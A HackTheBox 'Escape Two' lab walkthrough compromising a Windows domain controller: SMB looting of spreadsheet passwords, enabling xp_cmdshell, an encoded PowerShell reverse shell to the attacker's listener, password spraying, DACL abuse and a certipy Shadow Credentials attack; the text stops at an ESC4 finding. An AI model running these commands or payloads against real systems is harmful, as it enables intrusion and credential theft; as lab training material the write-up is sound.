Escape Two - HackTheBox | Pentest Notes

Using rose‘s SMB credentials on DC01, we accessed and extracted credentials from accounts.xlsx, including the MSSQL sa account. With mssqlclient.py, we enabled xp_cmdshell and obtained a shell as sql_svc.
From sql-Configuration.INI, we recovered plaintext credentials for sql_svc and sa. SMB enumeration revealed domain users, enabling a successful password spray attack as ryan. Using WinRM, we retrieved user.txt.
Privilege escalation via AD CS ESC4 exploited ryan’s Write Owner over CA_SVC. We modified ownership, granted GenericAll, and performed a Shadow Credentials attack to retrieve CA_SVC‘s NT hash. Finally, by setting Administrator’s UPN and using certipy auth, we obtained the NT hash, achieving full domain compromise.

Nmap

➜  EscapeTwo nmap -sCV 10.10.11.51 -v
Starting Nmap 7.95 ( https://nmap.org ) at 2025-02-24 11:05 EST
NSE: Loaded 157 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Initiating NSE at 11:05
Completed NSE at 11:05, 0.00s elapsed
Initiating Ping Scan at 11:05
Scanning 10.10.11.51 [4 ports]
Completed Ping Scan at 11:05, 0.43s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 11:05
Completed Parallel DNS resolution of 1 host. at 11:05, 0.04s elapsed
Initiating SYN Stealth Scan at 11:05
Scanning 10.10.11.51 [1000 ports]
Discovered open port 135/tcp on 10.10.11.51
Discovered open port 445/tcp on 10.10.11.51
Discovered open port 53/tcp on 10.10.11.51
Discovered open port 139/tcp on 10.10.11.51
Discovered open port 3268/tcp on 10.10.11.51
Discovered open port 636/tcp on 10.10.11.51
Discovered open port 593/tcp on 10.10.11.51
Discovered open port 389/tcp on 10.10.11.51
Discovered open port 88/tcp on 10.10.11.51
Discovered open port 1433/tcp on 10.10.11.51
Discovered open port 464/tcp on 10.10.11.51
Discovered open port 464/tcp on 10.10.11.51
Discovered open port 3269/tcp on 10.10.11.51
Discovered open port 5985/tcp on 10.10.11.51
Completed SYN Stealth Scan at 11:05, 41.44s elapsed (1000 total ports)
Initiating Service scan at 11:05
Scanning 13 services on 10.10.11.51
Completed Service scan at 11:06, 60.46s elapsed (13 services on 1 host)
NSE: Script scanning 10.10.11.51.
Initiating NSE at 11:06
Completed NSE at 11:07, 40.15s elapsed
Initiating NSE at 11:07
Completed NSE at 11:07, 12.84s elapsed
Initiating NSE at 11:07
Completed NSE at 11:07, 0.00s elapsed
Nmap scan report for 10.10.11.51
Host is up (0.36s latency).
Not shown: 987 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2025-02-24 09:11:45Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-24T09:13:31+00:00; -6h54m09s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2025-02-24T09:13:30+00:00; -6h54m10s from scanner time.
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
| ms-sql-ntlm-info: 
|   10.10.11.51:1433: 
|     Target_Name: SEQUEL
|     NetBIOS_Domain_Name: SEQUEL
|     NetBIOS_Computer_Name: DC01
|     DNS_Domain_Name: sequel.htb
|     DNS_Computer_Name: DC01.sequel.htb
|     DNS_Tree_Name: sequel.htb
|_    Product_Version: 10.0.17763
|_ssl-date: 2025-02-24T09:13:32+00:00; -6h54m09s from scanner time.
| ms-sql-info: 
|   10.10.11.51:1433: 
|     Version: 
|       name: Microsoft SQL Server 2019 RTM
|       number: 15.00.2000.00
|       Product: Microsoft SQL Server 2019
|       Service pack level: RTM
|       Post-SP patches applied: false
|_    TCP port: 1433
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Issuer: commonName=SSL_Self_Signed_Fallback
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2025-02-24T08:22:17
| Not valid after:  2055-02-24T08:22:17
| MD5:   92ca:8b16:646f:7eec:1116:b93d:4e7f:f5f4
|_SHA-1: 1277:c2ac:0636:9bfa:1d55:81c8:4a5b:3c5a:c852:192b
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
|_ssl-date: 2025-02-24T09:13:32+00:00; -6h54m09s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=DC01.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1:<unsupported>, DNS:DC01.sequel.htb
| Issuer: commonName=sequel-DC01-CA
| Public Key type: rsa
| Public Key bits: 2048
| Signature Algorithm: sha256WithRSAEncryption
| Not valid before: 2024-06-08T17:35:00
| Not valid after:  2025-06-08T17:35:00
| MD5:   09fd:3df4:9f58:da05:410d:e89e:7442:b6ff
|_SHA-1: c3ac:8bfd:6132:ed77:2975:7f5e:6990:1ced:528e:aac5
|_ssl-date: 2025-02-24T09:13:30+00:00; -6h54m09s from scanner time.
5985/tcp open  http          Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
| smb2-time: 
|   date: 2025-02-24T09:12:50
|_  start_date: N/A
| smb2-security-mode: 
|   3:1:1: 
|_    Message signing enabled and required
|_clock-skew: mean: -6h54m10s, deviation: 1s, median: -6h54m09s

NSE: Script Post-scanning.
Initiating NSE at 11:07
Completed NSE at 11:07, 0.00s elapsed
Initiating NSE at 11:07
Completed NSE at 11:07, 0.00s elapsed
Initiating NSE at 11:07
Completed NSE at 11:07, 0.00s elapsed
Read data files from: /usr/share/nmap
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 155.78 seconds
           Raw packets sent: 2999 (131.932KB) | Rcvd: 35 (1.524KB)
➜  EscapeTwo

➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su                                          
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
➜  EscapeTwo

By using netexec’s spider_plus module we were able to see two excel file and copied to our machine.

➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su -M spider_plus
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Started module spidering_plus with the following options:
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  DOWNLOAD_FLAG: False
SPIDER_PLUS 10.10.11.51     445    DC01             [*]     STATS_FLAG: True
SPIDER_PLUS 10.10.11.51     445    DC01             [*] EXCLUDE_FILTER: ['print$', 'ipc$']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]   EXCLUDE_EXTS: ['ico', 'lnk']
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  MAX_FILE_SIZE: 50 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*]  OUTPUT_FOLDER: /tmp/nxc_hosted/nxc_spider_plus
SMB         10.10.11.51     445    DC01             [*] Enumerated shares
SMB         10.10.11.51     445    DC01             Share           Permissions     Remark                                                                                                                        
SMB         10.10.11.51     445    DC01             -----           -----------     ------                                                                                                                        
SMB         10.10.11.51     445    DC01             Accounting Department READ                                                                                                                                    
SMB         10.10.11.51     445    DC01             ADMIN$                          Remote Admin                                                                                                                  
SMB         10.10.11.51     445    DC01             C$                              Default share                                                                                                                 
SMB         10.10.11.51     445    DC01             IPC$            READ            Remote IPC                                                                                                                    
SMB         10.10.11.51     445    DC01             NETLOGON        READ            Logon server share                                                                                                            
SMB         10.10.11.51     445    DC01             SYSVOL          READ            Logon server share                                                                                                            
SMB         10.10.11.51     445    DC01             Users           READ                                                                                                                                          

SPIDER_PLUS 10.10.11.51     445    DC01             [+] Saved share-file metadata to "/tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json".
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Shares:           7 (Accounting Department, ADMIN$, C$, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Readable Shares:  5 (Accounting Department, IPC$, NETLOGON, SYSVOL, Users)
SPIDER_PLUS 10.10.11.51     445    DC01             [*] SMB Filtered Shares:  1
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total folders found:  76
SPIDER_PLUS 10.10.11.51     445    DC01             [*] Total files found:    67
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size average:    23.74 KB
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size min:        0 B
SPIDER_PLUS 10.10.11.51     445    DC01             [*] File size max:        512 KB
➜  EscapeTwo

➜  EscapeTwo cat /tmp/nxc_hosted/nxc_spider_plus/10.10.11.51.json
{
    "Accounting Department": {
        "accounting_2024.xlsx": {
            "atime_epoch": "2024-06-09 06:50:41",
            "ctime_epoch": "2024-06-09 05:45:02",
            "mtime_epoch": "2024-06-09 07:11:31",
            "size": "9.98 KB"
        },
        "accounts.xlsx": {
            "atime_epoch": "2024-06-09 06:52:21",
            "ctime_epoch": "2024-06-09 06:52:07",
            "mtime_epoch": "2024-06-09 07:11:31",
            "size": "6.62 KB"
        }
    },

➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --get-file accounting_2024.xlsx accounting_2024.xlsx --share "Accounting Department"
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [*] Copying "accounting_2024.xlsx" to "accounting_2024.xlsx"
SMB         10.10.11.51     445    DC01             [+] File "accounting_2024.xlsx" was downloaded to "accounting_2024.xlsx"
➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --get-file accounts.xlsx accounts.xlsx --share "Accounting Department"
SMB         10.10.11.51     445    DC01             [*] Windows 10 / Server 2019 Build 17763 x64 (name:DC01) (domain:sequel.htb) (signing:True) (SMBv1:False)
SMB         10.10.11.51     445    DC01             [+] sequel.htb\rose:KxEPkKe6R8su 
SMB         10.10.11.51     445    DC01             [*] Copying "accounts.xlsx" to "accounts.xlsx"
SMB         10.10.11.51     445    DC01             [+] File "accounts.xlsx" was downloaded to "accounts.xlsx"
➜  EscapeTwo

Since its xlsx file we can simply unzip it and get a file named xl/sharedStrings.xml inside that we will get credentials for mssql user sa.

➜  EscapeTwo unzip accounts.xlsx
Archive:  accounts.xlsx
file #1:  bad zipfile offset (local header sig):  0
  inflating: xl/workbook.xml         
  inflating: xl/theme/theme1.xml     
  inflating: xl/styles.xml           
  inflating: xl/worksheets/_rels/sheet1.xml.rels  
  inflating: xl/worksheets/sheet1.xml  
  inflating: xl/sharedStrings.xml    
  inflating: _rels/.rels             
  inflating: docProps/core.xml       
  inflating: docProps/app.xml        
  inflating: docProps/custom.xml     
  inflating: [Content_Types].xml     
➜  EscapeTwo firefox xl/sharedStrings.xml
➜  EscapeTwo

<sst count="25" uniqueCount="24">
<si>
<t xml:space="preserve">First Name</t>
</si>
<si>
<t xml:space="preserve">Last Name</t>
</si>
<si>
<t xml:space="preserve">Email</t>
</si>
<si>
<t xml:space="preserve">Username</t>
</si>
<si>
<t xml:space="preserve">Password</t>
</si>
<si>
<t xml:space="preserve">Angela</t>
</si>
<si>
<t xml:space="preserve">Martin</t>
</si>
<si>
<t xml:space="preserve">angela@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">angela</t>
</si>
<si>
<t xml:space="preserve">0fwz7Q4mSpurIt99</t>
</si>
<si>
<t xml:space="preserve">Oscar</t>
</si>
<si>
<t xml:space="preserve">Martinez</t>
</si>
<si>
<t xml:space="preserve">oscar@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">oscar</t>
</si>
<si>
<t xml:space="preserve">86LxLBMgEWaKUnBG</t>
</si>
<si>
<t xml:space="preserve">Kevin</t>
</si>
<si>
<t xml:space="preserve">Malone</t>
</si>
<si>
<t xml:space="preserve">kevin@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">kevin</t>
</si>
<si>
<t xml:space="preserve">Md9Wlq1E5bZnVDVo</t>
</si>
<si>
<t xml:space="preserve">NULL</t>
</si>
<si>
<t xml:space="preserve">sa@sequel.htb</t>
</si>
<si>
<t xml:space="preserve">sa</t>
</si>
<si>
<t xml:space="preserve">MSSQLP@ssw0rd!</t>
</si>
</sst>

By logging into mssql using mssqlclient.py we enabled enable_xp_cmdshell to execute commands inside mssql.

➜  EscapeTwo mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.10.11.51            
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> xp_cmdshell whoami
output           
--------------   
sequel\sql_svc   

NULL             

SQL (sa  dbo@master)>

Inside mssql shell I used powershell reverse shell payload and got a shell as sql_svc user.

➜  EscapeTwo mssqlclient.py sa:'MSSQLP@ssw0rd!'@10.10.11.51
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed database context to 'master'.
[*] INFO(DC01\SQLEXPRESS): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL (sa  dbo@master)> enable_xp_cmdshell
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'show advanced options' changed from 1 to 1. Run the RECONFIGURE statement to install.
INFO(DC01\SQLEXPRESS): Line 185: Configuration option 'xp_cmdshell' changed from 1 to 1. Run the RECONFIGURE statement to install.
SQL (sa  dbo@master)> xp_cmdshell powershell -e JABjAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFMAbwBjAGsAZQB0AHMALgBUAEMAUABDAGwAaQBlAG4AdAAoACIAMQAwAC4AMQAwAC4AMQA2AC4AMQA3ACIALAA0ADQAMwApADsAJABzAHQAcgBlAGEAbQAgAD0AIAAkAGMAbABpAGUAbgB0AC4ARwBlAHQAUwB0AHIAZQBhAG0AKAApADsAWwBiAHkAdABlAFsAXQBdACQAYgB5AHQAZQBzACAAPQAgADAALgAuADYANQA1ADMANQB8ACUAewAwAH0AOwB3AGgAaQBsAGUAKAAoACQAaQAgAD0AIAAkAHMAdAByAGUAYQBtAC4AUgBlAGEAZAAoACQAYgB5AHQAZQBzACwAIAAwACwAIAAkAGIAeQB0AGUAcwAuAEwAZQBuAGcAdABoACkAKQAgAC0AbgBlACAAMAApAHsAOwAkAGQAYQB0AGEAIAA9ACAAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAALQBUAHkAcABlAE4AYQBtAGUAIABTAHkAcwB0AGUAbQAuAFQAZQB4AHQALgBBAFMAQwBJAEkARQBuAGMAbwBkAGkAbgBnACkALgBHAGUAdABTAHQAcgBpAG4AZwAoACQAYgB5AHQAZQBzACwAMAAsACAAJABpACkAOwAkAHMAZQBuAGQAYgBhAGMAawAgAD0AIAAoAGkAZQB4ACAAJABkAGEAdABhACAAMgA+ACYAMQAgAHwAIABPAHUAdAAtAFMAdAByAGkAbgBnACAAKQA7ACQAcwBlAG4AZABiAGEAYwBrADIAIAA9ACAAJABzAGUAbgBkAGIAYQBjAGsAIAArACAAIgBQAFMAIAAiACAAKwAgACgAcAB3AGQAKQAuAFAAYQB0AGgAIAArACAAIgA+ACAAIgA7ACQAcwBlAG4AZABiAHkAdABlACAAPQAgACgAWwB0AGUAeAB0AC4AZQBuAGMAbwBkAGkAbgBnAF0AOgA6AEEAUwBDAEkASQApAC4ARwBlAHQAQgB5AHQAZQBzACgAJABzAGUAbgBkAGIAYQBjAGsAMgApADsAJABzAHQAcgBlAGEAbQAuAFcAcgBpAHQAZQAoACQAcwBlAG4AZABiAHkAdABlACwAMAAsACQAcwBlAG4AZABiAHkAdABlAC4ATABlAG4AZwB0AGgAKQA7ACQAcwB0AHIAZQBhAG0ALgBGAGwAdQBzAGgAKAApAH0AOwAkAGMAbABpAGUAbgB0AC4AQwBsAG8AcwBlACgAKQA=

sql_svc

Inside C:\SQL2019\ExpressAdv_ENU\sql-Configuration.INI file, we were able to find new password.

➜  EscapeTwo nc -nvlp 443
Listening on 0.0.0.0 443
Connection received on 10.10.11.51 65091

PS C:\Windows\system32> whoami
sequel\sql_svc
PS C:\Windows\system32>

PS C:\Windows\system32> cd C:/
PS C:\> ls


    Directory: C:\


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----        11/5/2022  12:03 PM                PerfLogs                                                              
d-r---         1/4/2025   7:11 AM                Program Files                                                         
d-----         6/9/2024   8:37 AM                Program Files (x86)                                                   
d-----         6/8/2024   3:07 PM                SQL2019                                                               
d-r---         6/9/2024   6:42 AM                Users                                                                 
d-----         1/4/2025   8:10 AM                Windows                                                               


PS C:\> cd SQL2019
PS C:\SQL2019> ls


    Directory: C:\SQL2019


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----         1/3/2025   7:29 AM                ExpressAdv_ENU                                                        


PS C:\SQL2019> cd ExpressAdv_ENU
PS C:\SQL2019\ExpressAdv_ENU> ls


    Directory: C:\SQL2019\ExpressAdv_ENU


Mode                LastWriteTime         Length Name                                                                  
----                -------------         ------ ----                                                                  
d-----         6/8/2024   3:07 PM                1033_ENU_LP                                                           
d-----         6/8/2024   3:07 PM                redist                                                                
d-----         6/8/2024   3:07 PM                resources                                                             
d-----         6/8/2024   3:07 PM                x64                                                                   
-a----        9/24/2019  10:03 PM             45 AUTORUN.INF                                                           
-a----        9/24/2019  10:03 PM            788 MEDIAINFO.XML                                                         
-a----         6/8/2024   3:07 PM             16 PackageId.dat                                                         
-a----        9/24/2019  10:03 PM         142944 SETUP.EXE                                                             
-a----        9/24/2019  10:03 PM            486 SETUP.EXE.CONFIG                                                      
-a----         6/8/2024   3:07 PM            717 sql-Configuration.INI                                                 
-a----        9/24/2019  10:03 PM         249448 SQLSETUPBOOTSTRAPPER.DLL                                              


PS C:\SQL2019\ExpressAdv_ENU> type sql-Configuration.INI
[OPTIONS]
ACTION="Install"
QUIET="True"
FEATURES=SQL
INSTANCENAME="SQLEXPRESS"
INSTANCEID="SQLEXPRESS"
RSSVCACCOUNT="NT Service\ReportServer$SQLEXPRESS"
AGTSVCACCOUNT="NT AUTHORITY\NETWORK SERVICE"
AGTSVCSTARTUPTYPE="Manual"
COMMFABRICPORT="0"
COMMFABRICNETWORKLEVEL=""0"
COMMFABRICENCRYPTION="0"
MATRIXCMBRICKCOMMPORT="0"
SQLSVCSTARTUPTYPE="Automatic"
FILESTREAMLEVEL="0"
ENABLERANU="False" 
SQLCOLLATION="SQL_Latin1_General_CP1_CI_AS"
SQLSVCACCOUNT="SEQUEL\sql_svc"
SQLSVCPASSWORD="WqSZAF6CysDQbGb3"
SQLSYSADMINACCOUNTS="SEQUEL\Administrator"
SECURITYMODE="SQL"
SAPWD="MSSQLP@ssw0rd!"
ADDCURRENTUSERASSQLADMIN="False"
TCPENABLED="1"
NPENABLED="1"
BROWSERSVCSTARTUPTYPE="Automatic"
IAcceptSQLServerLicenseTerms=True
PS C:\SQL2019\ExpressAdv_ENU>

For validate new password with any users we need to generate username so using nxc we can generate it.

➜  EscapeTwo nxc smb 10.10.11.51 -u rose -p KxEPkKe6R8su --users | awk '/SMB/ && $3 ~ /^[0-9]/ && $5 !~ /[*+\-]/ {print $5}' > valid_users.txt
Administrator
Guest
krbtgt
michael
ryan
oscar
sql_svc
rose
ca_svc
➜  EscapeTwo

User

After getting user lists i sprayed it with the password which we got from sql-Configuration.INI file and we got a hit on a user names ryan and got user.txt.

➜  EscapeTwo nxc winrm 10.10.11.51 -u valid_users.txt -p WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [*] Windows 10 / Server 2019 Build 17763 (name:DC01) (domain:sequel.htb)
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\Administrator:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\Guest:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\krbtgt:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [-] sequel.htb\michael:WqSZAF6CysDQbGb3
WINRM       10.10.11.51     5985   DC01             [+] sequel.htb\ryan:WqSZAF6CysDQbGb3 (Pwn3d!)
➜  EscapeTwo

➜  EscapeTwo evil-winrm -i sequel.htb -u ryan -p 'WqSZAF6CysDQbGb3'                         
                                        
Evil-WinRM shell v3.7
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\ryan\Documents> ls ../Desktop


    Directory: C:\Users\ryan\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        2/24/2025  12:22 AM             34 user.txt


*Evil-WinRM* PS C:\Users\ryan\Documents>

Root

With ryan we tried to dump bloodhound data using rusthound.

Bloodhound

➜  EscapeTwo rusthound --domain sequel.htb -i 10.10.11.51
---------------------------------------------------
Initializing RustHound at 04:56:17 on 02/24/25
Powered by g0h4n from OpenCyber
---------------------------------------------------

[2025-02-24T09:56:17Z INFO  rusthound] Verbosity level: Info
Username: ryan
Password: 
[2025-02-24T09:56:25Z INFO  rusthound::ldap] Connected to SEQUEL.HTB Active Directory!
[2025-02-24T09:56:25Z INFO  rusthound::ldap] Starting data collection...
[2025-02-24T09:56:32Z INFO  rusthound::ldap] All data collected for NamingContext DC=sequel,DC=htb
[2025-02-24T09:56:35Z INFO  rusthound::ldap] All data collected for NamingContext CN=Configuration,DC=sequel,DC=htb
[2025-02-24T09:56:35Z INFO  rusthound::json::parser] Starting the LDAP objects parsing...
[2025-02-24T09:56:35Z INFO  rusthound::json::parser::bh_41] MachineAccountQuota: 10
[2025-02-24T09:56:35Z INFO  rusthound::modules::adcs::parser] Found 12 enabled certificate templates
[2025-02-24T09:56:35Z INFO  rusthound::json::parser] Parsing LDAP objects finished!
[2025-02-24T09:56:35Z INFO  rusthound::json::checker] Starting checker to replace some values...
[2025-02-24T09:56:35Z INFO  rusthound::json::checker] Checking and replacing some values finished!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 10 users parsed!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_users.json created!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 67 groups parsed!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_groups.json created!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 computers parsed!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_computers.json created!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 ous parsed!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_ous.json created!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 domains parsed!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_domains.json created!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 2 gpos parsed!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_gpos.json created!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 21 containers parsed!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] .//20250224045850_sequel-htb_containers.json created!
[2025-02-24T09:58:50Z INFO  rusthound::json::maker] 1 cas parsed!

RustHound Enumeration Completed at 04:58:50 on 02/24/25! Happy Graphing!

➜  EscapeTwo

The user RYAN@SEQUEL.HTB has the ability to modify the owner of the CA_SVC@SEQUEL.HTB account since he has write owner permission. So to exploit this we can use bloodyAD and modify the owner to ryan.
We changed owner of CA_SVC as ryan.

1
2

➜  EscapeTwo bloodyAD --host 10.10.11.51 -d escapetwo.htb -u ryan -p WqSZAF6CysDQbGb3 set owner CA_SVC ryan 
[+] Old owner S-1-5-21-548670397-972687484-3496335370-512 is now replaced by ryan on CA_SVC

And after that i gave GenericAll privilege to ca_svc user.

➜  EscapeTwo dacledit.py -action write -rights 'FullControl' -principal ryan -target ca_svc 'sequel.htb'/"ryan":"WqSZAF6CysDQbGb3"
Impacket v0.13.0.dev0+20240916.171021.65b774de - Copyright Fortra, LLC and its affiliated companies 

[*] DACL backed up to dacledit-20250224-054907.bak
[*] DACL modified successfully!

Since we dont have ca_svc user password or hash, we used shadow credential to get NT hash of ca_svc using certipy.

➜  EscapeTwo certipy shadow auto -u 'ryan@sequel.htb' -p "WqSZAF6CysDQbGb3" -account 'ca_svc' -dc-ip '10.10.11.51' -target dc01.sequel.htb
Certipy v4.8.2 - by Oliver Lyak (ly4k)

[*] Targeting user 'ca_svc'
[*] Generating certificate
[*] Certificate generated
[*] Generating Key Credential
[*] Key Credential generated with DeviceID 'e9cbc711-26e5-8fe6-8d7b-0915e414d171'
[*] Adding Key Credential with device ID 'e9cbc711-26e5-8fe6-8d7b-0915e414d171' to the Key Credentials for 'ca_svc'
[*] Successfully added Key Credential with device ID 'e9cbc711-26e5-8fe6-8d7b-0915e414d171' to the Key Credentials for 'ca_svc'
[*] Authenticating as 'ca_svc' with the certificate
[*] Using principal: ca_svc@sequel.htb
[*] Trying to get TGT...
[*] Got TGT
[*] Saved credential cache to 'ca_svc.ccache'
[*] Trying to retrieve NT hash for 'ca_svc'
[*] Restoring the old Key Credentials for 'ca_svc'
[*] Successfully restored the old Key Credentials for 'ca_svc'
[*] NT hash for 'ca_svc': 3b181b914e7a9d5508ea1e20bc2b7fce
➜  EscapeTwo

Find vulnerable certificate using `Certipy`

After getting NT hash of ca_svc i used to find if there is any vulnerable templates and we found a template named DunderMifflinAuthentication is vulnerable to ESC4.

